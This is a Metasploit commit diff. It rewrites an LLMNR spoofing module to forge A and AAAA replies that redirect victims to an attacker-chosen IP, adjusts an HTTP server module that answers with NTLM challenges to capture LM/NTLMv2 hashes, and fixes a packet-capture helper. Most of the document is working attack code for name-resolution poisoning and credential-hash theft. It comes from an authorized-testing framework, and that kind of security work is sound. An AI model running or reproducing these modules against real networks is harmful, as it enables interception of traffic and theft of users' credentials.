Convert llmnr_response to use Net::DNS

* Allows responding to AAAA requests in addition to the existing A
  support
* Prevents problems when recvfrom returns a mapped address like
  "::ffff:192.0.2.1"

Also:

* Fix a few typos
* capture: Don't shadow a method name (arp) with a local variable
* capture: Handle the case where our UDP send hits an ENETUNREACH

Author: egypt

lib/msf/core/exploit/capture.rb

@@ -48,15 +48,15 @@ def initialize(info = {})
         begin
           require 'pcaprub'
           @pcaprub_loaded = true
-        rescue ::Exception => e
+        rescue ::LoadError => e
           @pcaprub_loaded = false
           @pcaprub_error  = e
         end
 
         begin
           require 'network_interface'
           @network_interface_loaded = true
-        rescue ::Exception => e
+        rescue ::LoadError => e
           @network_interface_loaded = false
           @network_interface_error  = e
         end
@@ -97,7 +97,7 @@ def open_pcap(opts={})
         len = (opts['SNAPLEN'] || datastore['SNAPLEN'] || 65535).to_i
         tim = (opts['TIMEOUT'] || datastore['TIMEOUT'] || 0).to_i
         fil = opts['FILTER'] || datastore['FILTER']
-        arp = opts['ARPCAP'] || true
+        do_arp = (opts['ARPCAP'] == false) ? false : true
 
         # Look for a PCAP file
         cap = datastore['PCAPFILE'] || ''
@@ -115,7 +115,7 @@ def open_pcap(opts={})
           end
 
           self.capture = ::Pcap.open_live(dev, len, true, tim)
-          if arp
+          if do_arp
             self.arp_capture = ::Pcap.open_live(dev, 512, true, tim)
             preamble         = datastore['UDP_SECRET'].to_i
             arp_filter       = "arp[6:2] = 2 or (udp[8:4] = #{preamble})"
@@ -125,7 +125,7 @@ def open_pcap(opts={})
 
         if (not self.capture)
           raise RuntimeError, "Could not start the capture process"
-        elsif (arp and !self.arp_capture and cap.empty?)
+        elsif (do_arp and !self.arp_capture and cap.empty?)
           raise RuntimeError, "Could not start the ARP capture process"
         end
 
@@ -141,7 +141,6 @@ def close_pcap
 
       def capture_extract_ies(raw)
         set = {}
-        ret = 0
         idx = 0
         len = 0
 
@@ -279,7 +278,7 @@ def inject_reply(proto=:udp, pcap=self.capture)
       # This ascertains the correct Ethernet addresses one should use to
       # ensure injected IP packets actually get where they are going, and
       # manages the self.arp_cache hash. It always uses self.arp_capture
-      # do inject and capture packets, and will always first fire off a
+      # to inject and capture packets, and will always first fire off a
       # UDP packet using the regular socket to learn the source host's
       # and gateway's mac addresses.
       def lookup_eth(addr=nil, iface=nil)
@@ -309,7 +308,15 @@ def probe_gateway(addr)
         dst_port = rand(30000)+1024
         preamble = [datastore['UDP_SECRET']].pack("N")
         secret   = "#{preamble}#{Rex::Text.rand_text(rand(0xff)+1)}"
-        UDPSocket.open.send(secret, 0, dst_host, dst_port)
+
+        begin
+          UDPSocket.open.send(secret, 0, dst_host, dst_port)
+        rescue Errno::ENETUNREACH
+          # This happens on networks with no gatway. We'll need to use a
+          # fake source hardware address.
+          self.arp_cache[Rex::Socket.source_address(addr)] = "00:00:00:00:00:00"
+        end
+
         begin
           to = (datastore['TIMEOUT'] || 1500).to_f / 1000.0
           ::Timeout.timeout(to) do
@@ -415,7 +422,7 @@ def should_arp?(ip)
 
       attr_accessor :capture, :arp_cache, :arp_capture, :dst_cache
 
-      #Netifaces code
+      # Netifaces code
 
       def netifaces_implemented?
         @network_interface_loaded and
@@ -486,8 +493,8 @@ def get_ipv4_addr(dev, num=0)
         check_pcaprub_loaded
         dev   = get_interface_guid(dev)
         addrs = NetworkInterface.addresses(dev)
-        raise RuntimeError, "Interface #{dev} do not exists" if !addrs
-        raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[NetworkInterface::AF_INET].length < num + 1
+        raise RuntimeError, "Interface #{dev} does not exist" if !addrs
+        raise RuntimeError, "Interface #{dev} does not have an ipv4 address at position #{num}" if addrs[NetworkInterface::AF_INET].length < num + 1
         raise RuntimeError, "Can not get the IPv4 address for interface #{dev}" if !addrs[NetworkInterface::AF_INET][num]['addr']
         addrs[NetworkInterface::AF_INET][num]['addr']
       end
@@ -496,8 +503,8 @@ def get_ipv4_netmask(dev, num=0)
         check_pcaprub_loaded
         dev   = get_interface_guid(dev)
         addrs = NetworkInterface.addresses(dev)
-        raise RuntimeError, "Interface #{dev} do not exists" if !addrs
-        raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[NetworkInterface::AF_INET].length < num + 1
+        raise RuntimeError, "Interface #{dev} does not exist" if !addrs
+        raise RuntimeError, "Interface #{dev} does not have an ipv4 address at position #{num}" if addrs[NetworkInterface::AF_INET].length < num + 1
         raise RuntimeError, "Can not get IPv4 netmask for interface #{dev}" if !addrs[NetworkInterface::AF_INET][num]['netmask']
         addrs[NetworkInterface::AF_INET][num]['netmask']
       end

modules/auxiliary/server/capture/http_ntlm.rb

@@ -60,18 +60,24 @@ def initialize(info = {})
   end
 
   def on_request_uri(cli, request)
-    print_status("Request '#{request.uri}'...")
+    vprint_status("Request '#{request.uri}'")
 
     case request.method
     when 'OPTIONS'
       process_options(cli, request)
     else
       # If the host has not started auth, send 401 authenticate with only the NTLM option
       if(!request.headers['Authorization'])
+        vprint_status("401 '#{request.uri}'")
         response = create_response(401, "Unauthorized")
         response.headers['WWW-Authenticate'] = "NTLM"
+        response.headers['Proxy-Support'] = 'Session-Based-Authentication'
+        response.body =
+          "<HTML><HEAD><TITLE>You are not authorized to view this page</TITLE></HEAD></HTML>"
+
         cli.send_response(response)
       else
+        vprint_status("Continuing auth '#{request.uri}'")
         method,hash = request.headers['Authorization'].split(/\s+/,2)
         # If the method isn't NTLM something odd is goign on. Regardless, this won't get what we want, 404 them
         if(method != "NTLM")
@@ -144,7 +150,7 @@ def handle_auth(cli,hash)
       nt_len = ntlm_hash.length
 
       if nt_len == 48 #lmv1/ntlmv1 or ntlm2_session
-        arg = {	:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
+        arg = { :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
           :lm_hash => lm_hash,
           :nt_hash => ntlm_hash
         }
@@ -155,11 +161,11 @@ def handle_auth(cli,hash)
       #if the length of the ntlm response is not 24 then it will be bigger and represent
       # a ntlmv2 response
       elsif nt_len > 48 #lmv2/ntlmv2
-        arg = {	:ntlm_ver 		=> NTLM_CONST::NTLM_V2_RESPONSE,
-          :lm_hash 		=> lm_hash[0, 32],
-          :lm_cli_challenge 	=> lm_hash[32, 16],
-          :nt_hash 		=> ntlm_hash[0, 32],
-          :nt_cli_challenge 	=> ntlm_hash[32, nt_len  - 32]
+        arg = { :ntlm_ver   => NTLM_CONST::NTLM_V2_RESPONSE,
+          :lm_hash   => lm_hash[0, 32],
+          :lm_cli_challenge  => lm_hash[32, 16],
+          :nt_hash   => ntlm_hash[0, 32],
+          :nt_cli_challenge  => ntlm_hash[32, nt_len  - 32]
         }
       elsif nt_len == 0
         print_status("Empty hash from #{host} captured, ignoring ... ")
@@ -337,7 +343,7 @@ def html_get_hash(arg = {})
         :active => true
       )
       #if(datastore['LOGFILE'])
-      #	File.open(datastore['LOGFILE'], "ab") {|fd| fd.puts(capturelogmessage + "\n")}
+      #  File.open(datastore['LOGFILE'], "ab") {|fd| fd.puts(capturelogmessage + "\n")}
       #end
 
       if(datastore['CAINPWFILE'] and user)

modules/auxiliary/spoof/llmnr/llmnr_response.rb

@@ -8,6 +8,7 @@
 require 'msf/core'
 require 'socket'
 require 'ipaddr'
+require 'net/dns'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -57,80 +58,92 @@ def initialize
     self.sock = nil
   end
 
-  def dispatch_request(packet, addr)
-    rhost = addr[0]
-    src_port = addr[1]
-
-    # Getting info from the request packet
-    llmnr_transid      = packet[0..1]
-    llmnr_flags        = packet[2..3]
-    llmnr_questions    = packet[4..5]
-    llmnr_answerrr     = packet[6..7]
-    llmnr_authorityrr  = packet[8..9]
-    llmnr_additionalrr = packet[10..11]
-    llmnr_name_length  = packet[12..12]
-    name_end =  13 + llmnr_name_length.unpack('C')[0].to_int
-    llmnr_name = packet[13..name_end-1]
-    llmnr_name_and_length = packet[12..name_end]
-    llmnr_type = packet[name_end+1..name_end+2]
-    llmnr_class = packet[name_end+3..name_end+4]
-
-    llmnr_decodedname = llmnr_name.unpack('a*')[0].to_s
-
-    if datastore['DEBUG']
-      print_status("Received Packet from: #{rhost}:#{src_port}")
-      print_status("transid:        #{llmnr_transid.unpack('H4')}")
-      print_status("tlags:          #{llmnr_flags.unpack('B16')}")
-      print_status("questions:      #{llmnr_questions.unpack('n')}")
-      print_status("answerrr:       #{llmnr_answerrr.unpack('n')}")
-      print_status("authorityrr:    #{llmnr_authorityrr.unpack('n')}")
-      print_status("additionalrr:   #{llmnr_additionalrr.unpack('n')}")
-      print_status("name length:    #{llmnr_name_length.unpack('c')}")
-      print_status("name:           #{llmnr_name.unpack('a*')}")
-      print_status("decodedname:    #{llmnr_decodedname}")
-      print_status("type:           #{llmnr_type.unpack('n')}")
-      print_status("class:          #{llmnr_class.unpack('n')}")
+  def dispatch_request(packet, rhost, src_port)
+    rhost = ::IPAddr.new(rhost)
+
+    # `recvfrom` (on Linux at least) will give us an ipv6/ipv4 mapped
+    # addr like "::ffff:192.168.0.1" when the interface we're listening
+    # on has an IPv6 address. Convert it to just the v4 addr
+    if rhost.ipv4_mapped?
+      rhost = rhost.native
     end
 
-    if (llmnr_decodedname =~ /#{datastore['REGEX']}/i)
-      # Header
-      response =  llmnr_transid
-      response << "\x80\x00" # Flags TODO add details
-      response << "\x00\x01" # Questions = 1
-      response << "\x00\x01" # Answer RRs = 1
-      response << "\x00\x00" # Authority RRs = 0
-      response << "\x00\x00" # Additional RRs = 0
-      # Query part
-      response << llmnr_name_and_length
-      response << llmnr_type
-      response << llmnr_class
-      # Answer part
-      response << llmnr_name_and_length
-      response << llmnr_type
-      response << llmnr_class
-      response << [datastore['TTL']].pack("N") #Default 5 minutes
-      response << "\x00\x04" # Datalength = 4
-      response << Rex::Socket.addr_aton(datastore['SPOOFIP'])
-
-      open_pcap
-        # Sending UDP unicast response
-        p = PacketFu::UDPPacket.new
-        p.ip_saddr = Rex::Socket.source_address(rhost)
-        p.ip_daddr = rhost
-        p.ip_ttl = 255
-        p.udp_sport = 5355 # LLMNR UDP port
-        p.udp_dport = src_port # Port used by sender
-        p.payload = response
-        p.recalc
-
-        capture_sendto(p, rhost,true)
-        if should_print_reply?(llmnr_decodedname)
-          print_good("#{Time.now.utc} : Reply for #{llmnr_decodedname} sent to #{rhost} with spoofed IP #{datastore['SPOOFIP']}")
-        end
-      close_pcap
+    dns_pkt = ::Net::DNS::Packet.parse(packet)
+    spoof = ::IPAddr.new(datastore['SPOOFIP'])
+
+    # Turn this packet into a response
+    dns_pkt.header.qr = 1
+
+    dns_pkt.question.each do |question|
+      name = question.qName
+      unless name =~ /#{datastore['REGEX']}/i
+        vprint_status("#{rhost.to_s.ljust 16} llmnr - #{name} did not match REGEX \"#{datastore['REGEX']}\"")
+        next
+      end
+
+      if should_print_reply?(name)
+        print_good("#{rhost.to_s.ljust 16} llmnr - #{name} matches regex, responding with #{datastore['SPOOFIP']}")
+      end
+
+      # qType is not a Fixnum, so to compare it with `case` we have to
+      # convert it
+      case question.qType.to_i
+      when ::Net::DNS::A
+        dns_pkt.answer << ::Net::DNS::RR::A.new(
+          :name => name,
+          :ttl => 30,
+          :cls => ::Net::DNS::IN,
+          :type => ::Net::DNS::A,
+          :address => spoof.to_s
+        )
+      when ::Net::DNS::AAAA
+        dns_pkt.answer << ::Net::DNS::RR::AAAA.new(
+          :name => name,
+          :ttl => 30,
+          :cls => ::Net::DNS::IN,
+          :type => ::Net::DNS::AAAA,
+          :address => (spoof.ipv6? ? spoof : spoof.ipv4_mapped).to_s
+        )
+      else
+        print_warning("#{rhost.to_s.ljust 16} llmnr - Unknown RR type, this shouldn't happen. Skipping")
+        next
+      end
+    end
+
+    # If we didn't find anything we want to spoof, don't send any
+    # packets
+    return if dns_pkt.answer.empty?
+
+    udp = ::PacketFu::UDPHeader.new(
+      :udp_src => 5355,
+      :udp_dst => src_port,
+      :body => dns_pkt.data
+    )
+    udp.udp_recalc
+    if rhost.ipv4?
+      ip_pkt = ::PacketFu::IPPacket.new(
+        :ip_src => spoof.hton,
+        :ip_dst => rhost.hton,
+        :ip_proto => 0x11, # UDP
+        :body => udp
+      )
+    elsif rhost.ipv6?
+      ip_pkt = ::PacketFu::IPv6Packet.new(
+        :ipv6_src => spoof.hton,
+        :ipv6_dst => rhost.hton,
+        :ip_proto => 0x11, # UDP
+        :body => udp
+      )
     else
-      vprint_status("Packet received from #{rhost} with name #{llmnr_decodedname} did not match REGEX \"#{datastore['REGEX']}\"")
+      # Should never get here
+      print_error("IP version is not 4 or 6. Failed to parse?")
+      return
     end
+    ip_pkt.recalc
+
+    open_pcap
+      capture_sendto(ip_pkt, rhost.to_s, true)
+    close_pcap
   end
 
   def monitor_socket
@@ -143,8 +156,7 @@ def monitor_socket
 
       if (r != nil and r[0] == self.sock)
         packet, host, port = self.sock.recvfrom(65535)
-        addr = [host,port]
-        dispatch_request(packet, addr)
+        dispatch_request(packet, host, port)
       end
     end
   end
@@ -168,16 +180,23 @@ def run
     check_pcaprub_loaded()
     ::Socket.do_not_reverse_lookup = true
 
-    multicast_addr = "224.0.0.252" #Multicast Address for LLMNR
+    # Multicast Address for LLMNR
+    multicast_addr = ::IPAddr.new("224.0.0.252")
+
+    # The bind address here will determine which interface we receive
+    # multicast packets from. If the address is INADDR_ANY, we get them
+    # from all interfaces, so try to restrict if we can, but fall back
+    # if we can't
+    bind_addr = get_ipv4_addr(datastore["INTERFACE"]) rescue "0.0.0.0"
 
-    optval = ::IPAddr.new(multicast_addr).hton + ::IPAddr.new("0.0.0.0").hton
+    optval = multicast_addr.hton + ::IPAddr.new(bind_addr).hton
     self.sock = Rex::Socket.create_udp(
+      # This must be INADDR_ANY to receive multicast packets
       'LocalHost' => "0.0.0.0",
       'LocalPort' => 5355)
     self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
     self.sock.setsockopt(::Socket::IPPROTO_IP, ::Socket::IP_ADD_MEMBERSHIP, optval)
 
-
     self.thread = Rex::ThreadFactory.spawn("LLMNRServerMonitor", false) {
         monitor_socket
     }